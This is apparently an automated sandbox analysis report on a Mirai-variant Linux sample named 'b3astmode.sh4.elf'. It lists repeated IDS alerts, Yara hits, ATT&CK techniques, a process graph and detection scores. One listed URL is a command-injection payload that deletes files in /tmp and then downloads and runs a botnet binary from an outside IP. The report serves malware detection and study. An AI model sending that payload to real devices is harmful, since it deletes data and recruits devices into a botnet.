              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
              Source: Yara matchFile source: b3astmode.sh4.elf, type: SAMPLE
              Source: Yara matchFile source: 6259.1.00007f09d8400000.00007f09d840b000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6264.1.00007f09d8400000.00007f09d840b000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: 6278.1.00007f09d8400000.00007f09d840b000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: b3astmode.sh4.elf PID: 6259, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: b3astmode.sh4.elf PID: 6264, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: b3astmode.sh4.elf PID: 6278, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
              File Deletion
              1
              OS Credential Dumping
              11
              Security Software Discovery
              Remote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media11
              Non-Standard Port
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging1
              Ingress Tool Transfer
              Scheduled TransferData Encrypted for Impact
              No configs have been found
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574165 Sample: b3astmode.sh4.elf Startdate: 13/12/2024 Architecture: LINUX Score: 88 28 186.121.193.246, 37215, 37604, 38148 AXSBoliviaSABO Bolivia 2->28 30 197.152.177.200 airtel-tz-asTZ Tanzania United Republic of 2->30 32 98 other IPs or domains 2->32 34 Suricata IDS alerts for network traffic 2->34 36 Antivirus / Scanner detection for submitted sample 2->36 38 Detected Mirai 2->38 40 4 other signatures 2->40 8 b3astmode.sh4.elf 2->8         started        10 dash rm 2->10         started        12 dash rm 2->12         started        signatures3 process4 process5 14 b3astmode.sh4.elf 8->14         started        16 b3astmode.sh4.elf 8->16         started        18 b3astmode.sh4.elf 8->18         started        process6 20 b3astmode.sh4.elf 14->20         started        22 b3astmode.sh4.elf 14->22         started        24 b3astmode.sh4.elf 14->24         started        26 b3astmode.sh4.elf 14->26         started       
              SourceDetectionScannerLabelLink
              b3astmode.sh4.elf66%ReversingLabsLinux.Trojan.Mirai
              b3astmode.sh4.elf63%VirustotalBrowse
              b3astmode.sh4.elf100%AviraLINUX/Mirai.bonb
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws0%Avira URL Cloudsafe
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
